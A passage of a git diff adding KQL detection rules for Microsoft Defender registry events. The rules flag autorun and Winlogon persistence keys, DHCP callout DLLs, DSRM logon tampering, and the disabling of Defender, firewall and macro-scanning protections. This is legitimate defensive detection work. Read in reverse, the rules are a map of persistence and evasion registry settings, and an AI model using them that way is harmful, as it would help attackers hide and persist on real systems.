+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+//   - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\SYSTEM\\CurrentControlSet\\Control" and (RegistryKey contains "\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\Terminal Server\\Wds\\rdpwd\\StartupPrograms" or RegistryKey contains "\\SecurityProviders\\SecurityProviders" or RegistryKey contains "\\SafeBoot\\AlternateShell" or RegistryKey contains "\\Print\\Providers" or RegistryKey contains "\\Print\\Monitors" or RegistryKey contains "\\NetworkProvider\\Order" or RegistryKey contains "\\Lsa\\Notification Packages" or RegistryKey contains "\\Lsa\\Authentication Packages" or RegistryKey contains "\\BootVerificationProgram\\ImagePath")) and (not((((RegistryValueData in~ ("cpwmon64_v40.dll", "CutePDF Writer")) and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "\\Print\\Monitors\\CutePDF Writer Monitor") or RegistryValueData =~ "(Empty)" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey contains "Print\\Monitors\\Appmon\\Ports\\Microsoft.Office.OneNote_" and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" and RegistryKey endswith "\\NetworkProvider\\Order\\ProviderOrder") or (RegistryValueData =~ "VNCpm.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\spoolsv.exe" and RegistryKey endswith "\\Print\\Monitors\\MONVNC\\Driver"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/currentversion_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/currentversion_autorun_keys_modification.kql
new file mode 100644
index 00000000..2fe90fd6
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/currentversion_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: CurrentVersion Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+//   - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion" and (RegistryKey contains "\\ShellServiceObjectDelayLoad" or RegistryKey endswith "\\Run*" or RegistryKey endswith "\\RunOnce*" or RegistryKey endswith "\\RunOnceEx*" or RegistryKey endswith "\\RunServices*" or RegistryKey endswith "\\RunServicesOnce*" or RegistryKey contains "\\Policies\\System\\Shell" or RegistryKey contains "\\Policies\\Explorer\\Run" or RegistryKey contains "\\Group Policy\\Scripts\\Startup" or RegistryKey contains "\\Group Policy\\Scripts\\Shutdown" or RegistryKey contains "\\Group Policy\\Scripts\\Logon" or RegistryKey contains "\\Group Policy\\Scripts\\Logoff" or RegistryKey contains "\\Explorer\\ShellServiceObjects" or RegistryKey contains "\\Explorer\\ShellIconOverlayIdentifiers" or RegistryKey contains "\\Explorer\\ShellExecuteHooks" or RegistryKey contains "\\Explorer\\SharedTaskScheduler" or RegistryKey contains "\\Explorer\\Browser Helper Objects" or RegistryKey contains "\\Authentication\\PLAP Providers" or RegistryKey contains "\\Authentication\\Credential Providers" or RegistryKey contains "\\Authentication\\Credential Provider Filters")) and (not(((RegistryValueData =~ "ctfmon.exe /n" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\userinit.exe") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe") or (RegistryValueData =~ "(Empty)" or RegistryKey endswith "\\NgcFirst\\ConsecutiveSwitchCount" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Roaming\\Spotify\\Spotify.exe" or InitiatingProcessFolderPath endswith "\\AppData\\Local\\WebEx\\WebexHost.exe") or (InitiatingProcessFolderPath in~ ("C:\\WINDOWS\\system32\\devicecensus.exe", "C:\\Windows\\system32\\winsat.exe", "C:\\Program Files\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\StandaloneUpdater\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft OneDrive\\Update\\OneDriveSetup.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\Addons\\OneDriveSetup.exe", "C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe", "C:\\Program Files\\Everything\\Everything.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\LogonUI.exe" and (RegistryKey endswith "\\Authentication\\Credential Providers\\{D6886603-9D2F-4EB2-B667-1971041FA96B}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{BEC09223-B018-416D-A0AC-523971B639F5}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{8AF662BF-65A0-4D0A-A540-A338A999D36F}*" or RegistryKey endswith "\\Authentication\\Credential Providers\\{27FBDB57-B613-4AF2-9D7E-4FA7A66C21AD}*")) or isnull(RegistryValueData) or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart " and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe")))) and (not(((RegistryValueData =~ "Binary Data" and (InitiatingProcessFolderPath in~ ("C:\\Program Files\\AVG\\Antivirus\\avgToolsSvc.exe", "C:\\Program Files (x86)\\AVG\\Antivirus\\avgToolsSvc.exe")) and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\StartupApproved\\Run*") or ((RegistryValueData in~ ("\"C:\\Program Files\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\AVG\\Antivirus\\AvLaunch.exe\" /gui", "{472083B0-C522-11CF-8763-00608CC02F24}", "{472083B1-C522-11CF-8763-00608CC02F24}")) and (InitiatingProcessFolderPath contains "C:\\Program Files\\AVG\\Antivirus\\Setup\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\AVG\\Antivirus\\Setup\\" or InitiatingProcessFolderPath contains "\\instup.exe")) or ((RegistryValueData in~ ("\"C:\\Program Files\\Avast Software\\Avast\\AvLaunch.exe\" /gui", "\"C:\\Program Files (x86)\\Avast Software\\Avast\\AvLaunch.exe\" /gui")) and (InitiatingProcessFolderPath contains "C:\\Program Files\\Avast Software\\Avast\\Setup\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Avast Software\\Avast\\Setup\\" or InitiatingProcessFolderPath contains "\\instup.exe")) or (RegistryValueData =~ "C:\\Program Files\\Aurora-Agent\\tools\\aurora-dashboard.exe" and (InitiatingProcessFolderPath endswith "\\aurora-agent-64.exe" or InitiatingProcessFolderPath endswith "\\aurora-agent.exe") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\aurora-dashboard") or (RegistryValueData endswith "\\Discord\\Update.exe --processStart Discord.exe" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Discord") or (RegistryValueData endswith "A251-47B7-93E1-CDD82E34AF8B}" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\regsvr32.exe" and RegistryKey contains "DropboxExt") or (RegistryValueData endswith "\\Everything\\Everything.exe\" -startup" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Run\\Everything") or (RegistryValueData contains "\\GoogleDriveFS.exe" and RegistryValueData startswith "C:\\Program Files\\Google\\Drive File Stream\\" and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleDriveFS") or ((RegistryValueData in~ ("{CFE8B367-77A7-41D7-9C90-75D16D7DC6B6}", "{A8E52322-8734-481D-A7E2-27B309EF8D56}", "{C973DA94-CBDF-4E77-81D1-E5B794FBD146}", "{51EF1569-67EE-4AD6-9646-E726C3FFC8A2}")) and RegistryKey contains "GoogleDrive") or (RegistryValueData =~ "C:\\Program Files\\Greenshot\\Greenshot.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Greenshot") or (RegistryValueData =~ "\"C:\\Program Files\\iTunes\\iTunesHelper.exe\"" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\iTunesHelper") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\ClickToRun\\")) or (RegistryValueData contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and (RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c rmdir /s /q \"C:\\Users\\" or RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\")) or (RegistryValueData =~ "C:\\Program Files\\Opera\\assistant\\browser_assistant.exe" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Browser Assistant") or ((RegistryValueData in~ ("C:\\Program Files\\Opera\\launcher.exe", "C:\\Program Files (x86)\\Opera\\launcher.exe")) and RegistryKey endswith "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Opera Stable") or ((RegistryValueData contains "\\AppData\\Local\\Package Cache\\{" and RegistryValueData contains "}\\python-") and RegistryValueData endswith ".exe\" /burn.runonce" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{") or (RegistryValueData contains "\\Microsoft\\Teams\\Update.exe --processStart" and InitiatingProcessFolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe") or (RegistryValueData =~ "\"C:\\Program Files\\Zoom\\bin\\installer.exe\" /repair" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\zoommsirepair"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/currentversion_nt_autorun_keys_modification.kql b/KQL/rules/windows/registry/registry_set/currentversion_nt_autorun_keys_modification.kql
new file mode 100644
index 00000000..72ecc7e3
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/currentversion_nt_autorun_keys_modification.kql
@@ -0,0 +1,13 @@
+// Title: CurrentVersion NT Autorun Keys Modification
+// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
+// Date: 2019-10-25
+// Level: medium
+// Description: Detects modification of autostart extensibility point (ASEP) in registry.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason
+//   - Legitimate administrator sets up autorun keys for legitimate reason
+
+DeviceRegistryEvents
+| where ((RegistryKey contains "\\Winlogon\\VmApplet" or RegistryKey contains "\\Winlogon\\Userinit" or RegistryKey contains "\\Winlogon\\Taskman" or RegistryKey contains "\\Winlogon\\Shell" or RegistryKey contains "\\Winlogon\\GpExtensions" or RegistryKey contains "\\Winlogon\\AppSetup" or RegistryKey contains "\\Winlogon\\AlternateShells\\AvailableShells" or RegistryKey contains "\\Windows\\IconServiceLib" or RegistryKey contains "\\Windows\\Appinit_Dlls" or RegistryKey contains "\\Image File Execution Options" or RegistryKey contains "\\Font Drivers" or RegistryKey contains "\\Drivers32" or RegistryKey contains "\\Windows\\Run" or RegistryKey contains "\\Windows\\Load") and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion") and (not((RegistryValueData =~ "(Empty)" or (RegistryKey endswith "\\Image File Execution Options*" and (RegistryKey endswith "\\DisableExceptionChainValidation" or RegistryKey endswith "\\MitigationOptions")) or isnull(RegistryValueData) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\RuntimeBroker.exe" and RegistryKey contains "\\runtimebroker.exe\\Microsoft.Windows.ShellExperienceHost") or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000009)", "DWORD (0x000003c0)")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" and (RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\PreviousPolicyAreas" or RegistryKey contains "\\Winlogon\\GPExtensions\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\MaxNoGPOListChangesInterval"))))) and (not((((RegistryValueData in~ ("explorer.exe", "C:\\Windows\\system32\\userinit.exe,")) and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avira\\Antivirus\\avguard.exe" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avira\\Antivirus\\avguard.exe") and RegistryKey endswith "SOFTWARE\\WOW6432Node\\Avira\\Antivirus\\Overwrite_Keys\\HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon*" and (RegistryKey endswith "\\userinit\\UseAsDefault" or RegistryKey endswith "\\shell\\UseAsDefault")) or (InitiatingProcessFolderPath endswith "\\MicrosoftEdgeUpdate.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Temp\\") or ((RegistryKey endswith "\\ClickToRunStore\\HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion*" or RegistryKey endswith "\\ClickToRun\\REGISTRY\\MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion*") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Microsoft Office\\root\\integration\\integrator.exe", "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe"))) or (InitiatingProcessFolderPath endswith "\\ngen.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (RegistryValueData endswith "\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" and RegistryValueData startswith "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Delete Cached Update Binary"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/custom_file_open_handler_executes_powershell.kql b/KQL/rules/windows/registry/registry_set/custom_file_open_handler_executes_powershell.kql
new file mode 100644
index 00000000..d4771fca
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/custom_file_open_handler_executes_powershell.kql
@@ -0,0 +1,10 @@
+// Title: Custom File Open Handler Executes PowerShell
+// Author: CD_R0M_
+// Date: 2022-06-11
+// Level: high
+// Description: Detects the abuse of custom file open handler, executing powershell
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceRegistryEvents
+| where (RegistryValueData contains "powershell" and RegistryValueData contains "-command") and RegistryKey endswith "shell\\open\\command*"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/default_rdp_port_changed_to_non_standard_port.kql b/KQL/rules/windows/registry/registry_set/default_rdp_port_changed_to_non_standard_port.kql
new file mode 100644
index 00000000..3ff58c13
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/default_rdp_port_changed_to_non_standard_port.kql
@@ -0,0 +1,12 @@
+// Title: Default RDP Port Changed to Non Standard Port
+// Author: frack113
+// Date: 2022-01-01
+// Level: high
+// Description: Detects changes to the default RDP port.
+// Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.
+// Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.010
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber" and (not(RegistryValueData =~ "DWORD (0x00000d3d)"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/dhcp_callout_dll_installation.kql b/KQL/rules/windows/registry/registry_set/dhcp_callout_dll_installation.kql
new file mode 100644
index 00000000..1f454f54
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/dhcp_callout_dll_installation.kql
@@ -0,0 +1,10 @@
+// Title: DHCP Callout DLL Installation
+// Author: Dimitrios Slamaris
+// Date: 2017-05-15
+// Level: high
+// Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.t1112
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutDlls" or RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutEnabled"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/directory_service_restore_mode_dsrm_registry_value_tampering.kql b/KQL/rules/windows/registry/registry_set/directory_service_restore_mode_dsrm_registry_value_tampering.kql
new file mode 100644
index 00000000..e2918b7f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/directory_service_restore_mode_dsrm_registry_value_tampering.kql
@@ -0,0 +1,15 @@
+// Title: Directory Service Restore Mode(DSRM) Registry Value Tampering
+// Author: Nischal Khadgi
+// Date: 2024-07-11
+// Level: high
+// Description: Detects changes to "DsrmAdminLogonBehavior" registry value.
+// During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.
+// Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory.
+// If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM.
+// If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped.
+// If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.persistence, attack.t1556
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\Control\\Lsa\\DsrmAdminLogonBehavior" and (not(RegistryValueData =~ "DWORD (0x00000000)"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_administrative_share_creation_at_startup.kql b/KQL/rules/windows/registry/registry_set/disable_administrative_share_creation_at_startup.kql
new file mode 100644
index 00000000..5c10c66e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_administrative_share_creation_at_startup.kql
@@ -0,0 +1,10 @@
+// Title: Disable Administrative Share Creation at Startup
+// Author: frack113
+// Date: 2022-01-16
+// Level: medium
+// Description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.005
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Services\\LanmanServer\\Parameters*" and (RegistryKey endswith "\\AutoShareWks" or RegistryKey endswith "\\AutoShareServer")
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_exploit_guard_network_protection_on_windows_defender.kql b/KQL/rules/windows/registry/registry_set/disable_exploit_guard_network_protection_on_windows_defender.kql
new file mode 100644
index 00000000..ce615daf
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_exploit_guard_network_protection_on_windows_defender.kql
@@ -0,0 +1,10 @@
+// Title: Disable Exploit Guard Network Protection on Windows Defender
+// Author: Austin Songer @austinsonger
+// Date: 2021-08-04
+// Level: medium
+// Description: Detects disabling Windows Defender Exploit Guard Network Protection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (00000001)" and RegistryKey contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_internal_tools_or_feature_in_registry.kql b/KQL/rules/windows/registry/registry_set/disable_internal_tools_or_feature_in_registry.kql
new file mode 100644
index 00000000..71d99a50
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_internal_tools_or_feature_in_registry.kql
@@ -0,0 +1,12 @@
+// Title: Disable Internal Tools or Feature in Registry
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec
+// Date: 2022-03-18
+// Level: medium
+// Description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112
+// False Positives:
+//   - Legitimate admin script
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin" or RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\InactivityTimeoutSecs" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\Storage\\Write Protection" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\StorageDevicePolicies\\WriteProtect")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisableCMD" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\StartMenuLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskmgr" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispBackgroundPage" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispCPL" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer\\DisableNotificationCenter" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD"))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_macro_runtime_scan_scope.kql b/KQL/rules/windows/registry/registry_set/disable_macro_runtime_scan_scope.kql
new file mode 100644
index 00000000..bb8b3f33
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_macro_runtime_scan_scope.kql
@@ -0,0 +1,10 @@
+// Title: Disable Macro Runtime Scan Scope
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-25
+// Level: high
+// Description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE*" and RegistryKey endswith "\\Microsoft\\Office*" and RegistryKey contains "\\Common\\Security") and RegistryKey endswith "\\MacroRuntimeScanScope"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_microsoft_defender_firewall_via_registry.kql b/KQL/rules/windows/registry/registry_set/disable_microsoft_defender_firewall_via_registry.kql
new file mode 100644
index 00000000..4f2a5274
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_microsoft_defender_firewall_via_registry.kql
@@ -0,0 +1,10 @@
+// Title: Disable Microsoft Defender Firewall via Registry
+// Author: frack113
+// Date: 2022-01-09
+// Level: medium
+// Description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Services\\SharedAccess\\Parameters\\FirewallPolicy*" and RegistryKey endswith "\\EnableFirewall"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_privacy_settings_experience_in_registry.kql b/KQL/rules/windows/registry/registry_set/disable_privacy_settings_experience_in_registry.kql
new file mode 100644
index 00000000..776e4c3e
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_privacy_settings_experience_in_registry.kql
@@ -0,0 +1,12 @@
+// Title: Disable Privacy Settings Experience in Registry
+// Author: frack113
+// Date: 2022-10-02
+// Level: medium
+// Description: Detects registry modifications that disable Privacy Settings Experience
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Legitimate admin script
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows\\OOBE\\DisablePrivacyExperience"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_pua_protection_on_windows_defender.kql b/KQL/rules/windows/registry/registry_set/disable_pua_protection_on_windows_defender.kql
new file mode 100644
index 00000000..7ea03a49
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_pua_protection_on_windows_defender.kql
@@ -0,0 +1,10 @@
+// Title: Disable PUA Protection on Windows Defender
+// Author: Austin Songer @austinsonger
+// Date: 2021-08-04
+// Level: high
+// Description: Detects disabling Windows Defender PUA protection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Policies\\Microsoft\\Windows Defender\\PUAProtection"
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_tamper_protection_on_windows_defender.kql b/KQL/rules/windows/registry/registry_set/disable_tamper_protection_on_windows_defender.kql
new file mode 100644
index 00000000..32689112
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_tamper_protection_on_windows_defender.kql
@@ -0,0 +1,10 @@
+// Title: Disable Tamper Protection on Windows Defender
+// Author: Austin Songer @austinsonger
+// Date: 2021-08-04
+// Level: medium
+// Description: Detects disabling Windows Defender Tamper Protection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
+| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows Defender\\Features\\TamperProtection") and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/registry/registry_set/disable_windows_defender_functionalities_via_registry_keys.kql b/KQL/rules/windows/registry/registry_set/disable_windows_defender_functionalities_via_registry_keys.kql
new file mode 100644
index 00000000..7b55237f
--- /dev/null
+++ b/KQL/rules/windows/registry/registry_set/disable_windows_defender_functionalities_via_registry_keys.kql
@@ -0,0 +1,13 @@
+// Title: Disable Windows Defender Functionalities Via Registry Keys
